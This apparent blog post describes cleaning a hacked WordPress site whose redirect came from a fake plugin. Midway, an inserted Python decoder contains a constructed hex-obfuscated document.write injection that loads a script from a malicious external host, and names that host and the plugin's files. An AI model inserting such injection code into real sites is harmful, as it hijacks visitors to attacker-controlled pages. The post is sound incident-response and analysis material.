As everyone knows, WordPress is a content management system (CMS) that is constantly being updated. If we don't update it, we run the risk of someone breaking in and manipulating the site. Yesterday a customer called to tell me that his WordPress website was redirecting to another URL. In his case, the site was redirecting to http://gualdacatas.com
I spent a while googling but found nothing about it, so I started investigating the site's behaviour more closely. Checking over FTP, I came across folders that had nothing to do with WordPress.
The site had clearly been infected and had a script that redirected to another site.
The next step was to delete all those directories to see whether that stopped the redirect, but it didn't. So I turned to the Firefox debugger.
I should clarify that the redirect only fired once, so to reproduce it I had to clear the cache or open the site in private browsing.
By inspecting the behavior of the page, I came across this:
It looked very strange… it was all hexadecimal… so I converted everything to ASCII to find out what it was.
As you can see above, it was a script that executed the URL: http://keit.staticweb.tk/z5z4vQ
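Decoding a hex-escaped blob like this can be scripted instead of done by hand. The following Python is an added example and not part of the original post: the obfuscated snippet it decodes is constructed here (the real payload is not reproduced in the post); only the URL it resolves to comes from the text above.

```python
import re

# Constructed sample (not the page's actual capture): a document.write()
# call whose argument is entirely \xNN-escaped, the pattern described above.
SAMPLE_INJECTION = (
    'document.write("'
    r'\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x22'                   # <script src="
    r'\x68\x74\x74\x70\x3a\x2f\x2f'                                           # http://
    r'\x6b\x65\x69\x74\x2e\x73\x74\x61\x74\x69\x63\x77\x65\x62\x2e\x74\x6b'   # keit.staticweb.tk
    r'\x2f\x7a\x35\x7a\x34\x76\x51'                                           # /z5z4vQ
    r'\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'                           # "></script>
    '");'
)

# Matches JavaScript-style \xNN escapes and URL-style %NN escapes.
_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|%([0-9a-fA-F]{2})")
_URL = re.compile(r"https?://[^\s\"'<>]+")


def decode_hex_escapes(blob: str) -> str:
    """Replace every \\xNN or %NN escape with the character it encodes."""
    return _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), blob)


def extract_urls(decoded: str) -> list:
    """Return the http(s) URLs found in decoded text."""
    return _URL.findall(decoded)


def analyse(blob: str) -> dict:
    """Decode a suspicious script fragment and summarise what it does.

    hex_escapes: how many escapes were present (a fully escaped payload is a
    strong obfuscation signal); urls: where it points; loads_external_script:
    whether the decoded text injects a <script> tag referencing a URL.
    """
    decoded = decode_hex_escapes(blob)
    urls = extract_urls(decoded)
    return {
        "hex_escapes": len(_HEX_ESCAPE.findall(blob)),
        "decoded": decoded,
        "urls": urls,
        "loads_external_script": "<script" in decoded.lower() and bool(urls),
    }


if __name__ == "__main__":
    result = analyse(SAMPLE_INJECTION)
    print(result["decoded"])
    print("Injected script URLs:", result["urls"])
```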
Upon entering that URL I came across the following:
That is exactly the site I was being redirected to… With this I had more to go on, and I found that “keit.staticweb.tk” is used by a fake WordPress plugin called _bb_press that redirects visitors to other sites, pornographic sites among them…
Now comes the fun part… Find and break that redirection.
Since it was a fake plugin, I went straight to the plugins directory, wp-content/plugins. There I found one called press_test515215 and, for obvious reasons, I knew that was it.
Upon entering the folder of that plugin, there was a file called press_test515215.php which included another file inside of it.
Code (PHP):
include(dirname(__FILE__) . '/includes/_bb_press_plugin.class.php');
By opening this second file, I came across this:
And there you have it! That was the redirect WordPress was performing. Fixing it was easy: delete the plugin and the site stops redirecting.